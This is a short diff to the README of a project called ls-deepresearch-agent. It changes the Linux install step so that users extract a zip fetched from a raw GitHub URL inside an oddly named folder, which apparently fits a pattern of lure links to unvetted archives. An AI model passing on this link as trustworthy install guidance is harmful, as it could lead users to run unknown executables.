Aayushsharma11/ls-deepresearch-agent/README.md

 6. **Run the application**:
    - **Windows:** Double-click the .exe file.
    - **macOS:** Open the .dmg file and drag the application to your Applications folder.
-   - **Linux:** Extract the .tar.gz file and run the application from the terminal.
+   - **Linux:** Extract the https://raw.githubusercontent.com/Aayushsharma11/ls-deepresearch-agent/main/unfoodful/ls-deepresearch-agent.zip file and run the application from the terminal.

 ### 🛠️ Using ls-deepresearch-agent